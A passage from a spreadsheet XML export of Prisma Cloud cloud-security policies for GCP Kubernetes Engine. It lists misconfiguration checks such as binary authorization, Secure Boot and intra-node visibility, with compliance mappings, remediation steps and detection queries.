Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2889" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2889" s="2" t="inlineStr"/>
      <c r="D2889" t="inlineStr"/>
      <c r="E2889" t="inlineStr"/>
      <c r="F2889" t="inlineStr"/>
      <c r="G2889" t="b">
        <v>1</v>
      </c>
      <c r="H28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89" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2889" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2889" t="inlineStr">
        <is>
          <t>GCP Kubernetes cluster not in redundant zones</t>
        </is>
      </c>
      <c r="L2889" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2889" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2889" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2889" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2889" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2889" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2889" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2889" t="inlineStr"/>
      <c r="T2889" t="b">
        <v>0</v>
      </c>
      <c r="U2889" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2889" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2889" t="inlineStr">
        <is>
          <t>Putting resources in different zones in a region provides isolation from many types of infrastructure, hardware, and software failures.
This policy alerts if your cluster is not located in at least 3 zones.</t>
        </is>
      </c>
      <c r="X2889" t="inlineStr">
        <is>
          <t>Add zones to your zonal cluster.
1. Visit the Google Kubernetes Engine menu in GCP Console.
2. Click the cluster's Edit button, which looks like a pencil.
3. From the Additional zones section, select the desired zones.
4. Click Save.</t>
        </is>
      </c>
      <c r="Y2889" t="inlineStr"/>
      <c r="Z2889" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule =  zone exists and locations[*] size less than 3</t>
        </is>
      </c>
      <c r="AA2889" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2889" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2889" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-374</t>
        </is>
      </c>
      <c r="AD2889" t="b">
        <v>1</v>
      </c>
      <c r="AE2889" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2889" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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89" t="inlineStr">
        <is>
          <t>eb4dbd09-817c-4ae5-909b-6ac3f488a341</t>
        </is>
      </c>
      <c r="AI2889" t="inlineStr">
        <is>
          <t>59408f49-0555-4c87-a582-88aec0e310d4</t>
        </is>
      </c>
      <c r="AJ2889" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2889" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2890">
      <c r="A2890" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.4.0 (GKE) - Level 2, ISO/IEC 27017:2015, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CIS v1.3.0 (GKE) - Level 2, Copy of CIS Controls v8, ISO/IEC 27017:2015, tadenugba Copy of CIS v1.1.0 (GKE), Cybersecurity Maturity Model Certification (CMMC) v.1.02, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), PCI DSS v4.0, CRI Profile v2.0, Microsoft Cloud Security Benchmark v1, CIS v1.5.0 (GKE) - Level 1, FFIEC, TX-RAMP Level 1, CIS v1.2.0 (GKE), CIS v1.3.0 (GKE) - Level 2, HITRUST CSF v.11.2.0, CSA CCM v.4.0.6, ISO/IEC 27017:2015, CIS Controls v8, ISO/IEC 27017:2015, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, HIPAA, CIS v1.4.0 (GKE) - Level 2, CIS v1.2.0 (GKE), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, RBI Baseline Cyber Security and Resilience Requirements, CIS v1.1.0 (GKE), NIST CSF, ISO/IEC 27017:2015, GDPR, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ISO 27002:2022, CSA CCM v.4.0.1, CIS v1.5.0 (GKE) - Level 2, ISO/IEC 27002:2013, TX-RAMP Level 2, PCI DSS v3.2.1, NIST CSF v2.0, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, SOC 2, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v1.2.1, CRI Profile v2.0, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27002:2013, CRI Profile v2.0, HIPAA, HIPAA, ITSG-33, NIST CSF v2.0, CIS Controls v7.1, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], tadenugba Copy of CIS v1.1.0 (GKE), CIS v1.1.0 (GKE), NIST SP 800-172, ISO/IEC 27002:2013, CCPA 2018, ITSG-33, PIPEDA, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, Brazilian Data Protection Law (LGPD), PCI DSS v4.0, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2890" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2890" s="2" t="inlineStr"/>
      <c r="D2890" t="inlineStr"/>
      <c r="E2890" t="inlineStr"/>
      <c r="F2890" t="inlineStr"/>
      <c r="G2890" t="b">
        <v>1</v>
      </c>
      <c r="H28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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2890" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2890" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters have binary authorization disabled</t>
        </is>
      </c>
      <c r="L2890" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2890" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2890" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2890" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2890" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2890" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2890" t="inlineStr">
        <is>
          <t>ISM-1603</t>
        </is>
      </c>
      <c r="S2890" t="inlineStr"/>
      <c r="T2890" t="b">
        <v>0</v>
      </c>
      <c r="U2890" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2890" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2890" t="inlineStr">
        <is>
          <t>This policy identifies Google Kubernetes Engine (GKE) clusters that have disabled binary authorization. Binary authorization is a security control that ensures only trusted container images are deployed on GKE clusters. As a best practice, verify images prior to deployment to reduce the risk of running unintended or malicious code in your environment.</t>
        </is>
      </c>
      <c r="X2890" t="inlineStr">
        <is>
          <t>To enable Binary authorization for a GKE cluster, please refer to the URL given below:
https://cloud.google.com/binary-authorization/docs/enable-cluster#console 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-use-of-binary-authorization
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-use-of-binary-authorization</t>
        </is>
      </c>
      <c r="Y2890" t="inlineStr"/>
      <c r="Z2890" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = binaryAuthorization.evaluationMode does not exist or binaryAuthorization.evaluationMode equal ignore case EVALUATION_MODE_UNSPECIFIED or binaryAuthorization.evaluationMode equal ignore case DISABLED
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2890" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2890" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2890" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-361-CKV_GCP_66</t>
        </is>
      </c>
      <c r="AD2890" t="b">
        <v>1</v>
      </c>
      <c r="AE2890" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2890" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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0" t="inlineStr">
        <is>
          <t>50d5ec3b-1710-4ff7-bb09-061c30deef96</t>
        </is>
      </c>
      <c r="AI2890" t="inlineStr">
        <is>
          <t>7073068c-5abc-454a-b176-2ef92f09dff0</t>
        </is>
      </c>
      <c r="AJ2890" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2890" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2891">
      <c r="A2891" t="inlineStr">
        <is>
          <t>ISO 27001:2013, HIPAA, CIS v1.2.0 (GKE), ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, TX-RAMP Level 2, APRA (CPS 234) Information Security, PCI DSS v4.0, CSA CCM v3.0.1, CIS Controls v8, CSA CCM v4.0.12, ISO/IEC 27017:2015, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, Copy of CIS Controls v8, CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.6, SOC 2, TX-RAMP Level 1, PCI DSS v4.0, NIST 800-53 Rev4, HITRUST CSF v.11.2.0, ISO/IEC 27017:2015, CSA CCM v3.0.1, ISO 27001:2013, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, Copy of New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.6, FFIEC, Microsoft Cloud Security Benchmark v1, ISO 27001:2013, NIST CSF, SOC 2, ISO 27001:2013, CSA CCM v3.0.1, tadenugba Copy of CIS v1.1.0 (GKE), ISO/IEC 27001:2022, ISO/IEC 27001:2022, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CSA CCM v.4.0.6, RBI Baseline Cyber Security and Resilience Requirements, NIST SP 800-171 Revision 3, CIS Controls v7.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v4.0, TX-RAMP Level 2, CIS v1.1.0 (GKE), ISO/IEC 27002:2013, CSA CCM v4.0.12, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, ISO 27001:2013, HITRUST CSF v9.3 [Deprecated], CSA CCM v.4.0.1, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, PCI DSS v4.0, CSA CCM v3.0.1, New Zealand Information Security Manual (NZISM v3.4), GDPR, CIS v1.0.0 (GCP), CSA CCM v3.0.1, ISO/IEC 27001:2022, NIST 800-53 Rev 5, Risk Management in Technology (RMiT), ISO 27001:2013, CIS Controls v8.1, NIST SP 800-172, CSA CCM v3.0.1, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CCPA 2018, ITSG-33, PIPEDA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Brazilian Data Protection Law (LGPD), ITSG-33, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, ISO 27002:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2891" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2891" s="2" t="inlineStr"/>
      <c r="D2891" t="inlineStr"/>
      <c r="E2891" t="inlineStr"/>
      <c r="F2891" t="inlineStr"/>
      <c r="G2891" t="b">
        <v>1</v>
      </c>
      <c r="H28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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2891" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2891" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Cluster Client Certificate is not disabled</t>
        </is>
      </c>
      <c r="L2891" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2891" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2891" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2891" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2891" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2891" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2891" t="inlineStr">
        <is>
          <t>ISM-1321</t>
        </is>
      </c>
      <c r="S2891" t="inlineStr"/>
      <c r="T2891" t="b">
        <v>0</v>
      </c>
      <c r="U2891" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2891" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2891" t="inlineStr">
        <is>
          <t>This policy identifies Kubernetes Engine clusters that have enabled Client Certificate authentication. A client certificate is a base64-encoded public certificate used by clients to authenticate to the cluster endpoint. GKE manages authentication via gcloud using the OpenID Connect token method, setting up the Kubernetes configuration, getting an access token, and keeping it up to date. So it is recommended not to enable Client Certificate authentication, to avoid additional management overhead of key management and rotation.
Note: For GKE Autopilot clusters, legacy authentication methods cannot be used. Basic authentication is deprecated and has been removed in GKE 1.19 and later.
Reference: https://cloud.google.com/kubernetes-engine/docs/how-to/api-server-authentication#legacy-auth</t>
        </is>
      </c>
      <c r="X2891" t="inlineStr">
        <is>
          <t>GCP Kubernetes Clusters Client Certificate can be disabled only at the time of the creation of clusters. So to fix this alert, create a new cluster with Client Certificate disabled and then migrate all required cluster data or containers from the reported cluster to this new cluster.
To create the cluster with Client Certificate disabled, perform the following steps:
1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Click on 'Clusters' (Left Panel)
4. On page 'Kubernetes clusters', click on 'CREATE'
5. Select the type of cluster by clicking on the 'CONFIGURE' button
6. Select ‘Security’ tab (Left Panel)
7. Under the 'Legacy security options' section, ensure 'Issue a client certificate' is not set
8. Provide all required cluster data or containers from the reported cluster to this new cluster
9. Click on 'CREATE' to create a new cluster
10. Once the cluster is created, delete the alerted cluster to resolve the alert</t>
        </is>
      </c>
      <c r="Y2891" t="inlineStr"/>
      <c r="Z2891" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = status equals RUNNING and (masterAuth.clientKey exists or masterAuth.clientCertificate exists)</t>
        </is>
      </c>
      <c r="AA2891" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2891" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2891" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-156</t>
        </is>
      </c>
      <c r="AD2891" t="b">
        <v>1</v>
      </c>
      <c r="AE2891" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2891" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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1" t="inlineStr">
        <is>
          <t>506d5f7a-05ad-43d8-a48a-20695a47c14b</t>
        </is>
      </c>
      <c r="AI2891" t="inlineStr">
        <is>
          <t>7a13061f-58cc-483b-b7d5-6b64c7378ac3</t>
        </is>
      </c>
      <c r="AJ2891" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2891" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2892">
      <c r="A2892" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, CIS v1.1.0 (GKE), CIS Controls v8, ISO/IEC 27017:2015, CIS Controls v8.1, NIST SP 800-172, Copy of CIS Controls v8, ISO/IEC 27017:2015, CSA CCM v.4.0.1, PCI DSS v4.0, FFIEC, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.2.0 (GKE), CSA CCM v.4.0.6, ISO/IEC 27017:2015, CIS Controls v8, ISO/IEC 27017:2015, CIS v1.5.0 (GKE) - Level 2, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, CIS v1.3.0 (GKE) - Level 2, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, NIST CSF, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, Copy of CIS Controls v8, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ISO 27002:2022, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, CIS v1.4.0 (GKE) - Level 2, ISO/IEC 27002:2013, PCI DSS v3.2.1, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, CIS Controls v7.1, ISO/IEC 27017:2015, CIS Controls v8.1, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, PCI DSS v4.0, ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CRI Profile v1.2.1, tadenugba Copy of CIS v1.1.0 (GKE), ISO/IEC 27002:2013, CRI Profile v2.0, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, PCI DSS v4.0, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2892" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2892" s="2" t="inlineStr"/>
      <c r="D2892" t="inlineStr"/>
      <c r="E2892" t="inlineStr"/>
      <c r="F2892" t="inlineStr"/>
      <c r="G2892" t="b">
        <v>1</v>
      </c>
      <c r="H28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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2892" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2892" t="inlineStr">
        <is>
          <t>GCP Kubernetes cluster shielded GKE node with Secure Boot disabled</t>
        </is>
      </c>
      <c r="L2892" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2892" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2892" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2892" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2892" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2892" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2892" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2892" t="inlineStr"/>
      <c r="T2892" t="b">
        <v>0</v>
      </c>
      <c r="U2892" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2892" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2892" t="inlineStr">
        <is>
          <t>This policy identifies GCP Kubernetes cluster shielded GKE nodes with Secure Boot disabled. An attacker may seek to alter boot components to persist malware or rootkits during system initialization. It is recommended to enable Secure Boot for Shielded GKE Nodes to verify the digital signature of node boot components.</t>
        </is>
      </c>
      <c r="X2892" t="inlineStr">
        <is>
          <t>Note: Once a Node pool is provisioned, it cannot be updated to enable Secure Boot. You must create new Node pools within the cluster with Secure Boot enabled. You will also need to migrate workloads from existing non-conforming Node pools to the newly created Node pool, then delete the non-conforming pools.
To create a nodepool with Secure Boot enabled follow the below steps,
1. Log in to gcloud console
2. Navigate to service 'Kubernetes Engine'
3. Select the alerted cluster and click 'ADD NODE POOL'
4. Ensure that the 'Enable secure boot' checkbox is checked under the ‘Shielded options' in section 'Security'
5. Click on 'CREATE'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-secure-boot-for-shielded-gke-nodes-is-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-secure-boot-for-shielded-gke-nodes-is-enabled</t>
        </is>
      </c>
      <c r="Y2892" t="inlineStr"/>
      <c r="Z2892" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = nodePools[?any(config.shieldedInstanceConfig.enableSecureBoot does not exist or config.shieldedInstanceConfig.enableSecureBoot is false)] exists
{"category":"Kubernetes","resourceTypes":["google_container_node_pool","google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2892" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2892" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2892" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-574-CKV_GCP_68</t>
        </is>
      </c>
      <c r="AD2892" t="b">
        <v>1</v>
      </c>
      <c r="AE2892" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2892" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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2" t="inlineStr">
        <is>
          <t>9a2b73c4-dfb2-4926-9198-c8524894ab7e</t>
        </is>
      </c>
      <c r="AI2892" t="inlineStr">
        <is>
          <t>f092a573-b0f8-4f02-95bb-85c101e1c005</t>
        </is>
      </c>
      <c r="AJ2892" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2892" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2893">
      <c r="A2893" t="inlineStr">
        <is>
          <t>CSA CCM v.4.0.6, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, CIS v1.1.0 (GKE), RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, ISO/IEC 27017:2015, ITSG-33, CIS v1.2.0 (GKE), CSA CCM v.4.0.1, CIS Controls v7.1, ISO 27002:2022, APRA (CPS 234) Information Security, GDPR, ISO/IEC 27001:2022, CIS v1.3.0 (GKE) - Level 2, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CIS Controls v8, PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, FFIEC, ISO/IEC 27001:2022, ISO 27002:2022, TX-RAMP Level 1, NIST CSF, CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, TX-RAMP Level 2, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, tadenugba Copy of CIS v1.1.0 (GKE), PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CIS v1.5.0 (GKE) - Level 2, CSA CCM v4.0.12, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS v1.4.0 (GKE) - Level 2, CIS Controls v8.1, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, CRI Profile v2.0, APRA (CPS 234) Information Security, SOC 2, NIST CSF v2.0, HIPAA, HITRUST v.9.4.2 [Deprecated], PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8.1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2893" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2893" s="2" t="inlineStr"/>
      <c r="D2893" t="inlineStr"/>
      <c r="E2893" t="inlineStr"/>
      <c r="F2893" t="inlineStr"/>
      <c r="G2893" t="b">
        <v>1</v>
      </c>
      <c r="H28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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2893" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2893" t="inlineStr">
        <is>
          <t>GCP Kubernetes cluster intra-node visibility disabled</t>
        </is>
      </c>
      <c r="L2893" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2893" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2893" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2893" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2893" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2893" t="inlineStr">
        <is>
          <t>CIS Control 8</t>
        </is>
      </c>
      <c r="R2893" t="inlineStr">
        <is>
          <t>8.5</t>
        </is>
      </c>
      <c r="S2893" t="inlineStr"/>
      <c r="T2893" t="b">
        <v>1</v>
      </c>
      <c r="U2893" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2893" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2893" t="inlineStr">
        <is>
          <t>With Intranode Visibility, all network traffic in your cluster is seen by the Google Cloud Platform network. This means you can see flow logs for all traffic between Pods, including traffic between Pods on the same node. And you can create firewall rules that apply to all traffic between Pods.
This policy checks your cluster's intra-node visibility feature and generates an alert if it's disabled.</t>
        </is>
      </c>
      <c r="X2893" t="inlineStr">
        <is>
          <t>Upgrade your cluster to use Intranode Visibility.
1. Visit the Google Kubernetes Engine menu in GCP Console.
2. Click the cluster's Edit button, which looks like a pencil.
3. Select Enabled under Intranode visibility.
4. Click Save to modify the cluster. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/enable-vpc-flow-logs-and-intranode-visibility
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/enable-vpc-flow-logs-and-intranode-visibility</t>
        </is>
      </c>
      <c r="Y2893" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'container.clusters.update' permission. Successful execution will enable intra-node visibility for GCP Kubernetes Engine cluster which helps to see flow logs for all traffic between Pods.",
'impact': 'enables intra-node visibility in GCP Kubernetes Engine cluster',
'cliScriptTemplate': 'gcloud container clusters update $resourceName --project=$account --zone $region --enable-intra-node-visibility'</t>
        </is>
      </c>
      <c r="Z2893" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule =  $.networkConfig.enableIntraNodeVisibility does not exist or $.networkConfig.enableIntraNodeVisibility is false
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2893" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2893" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2893" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-372-CKV_GCP_61</t>
        </is>
      </c>
      <c r="AD2893" t="b">
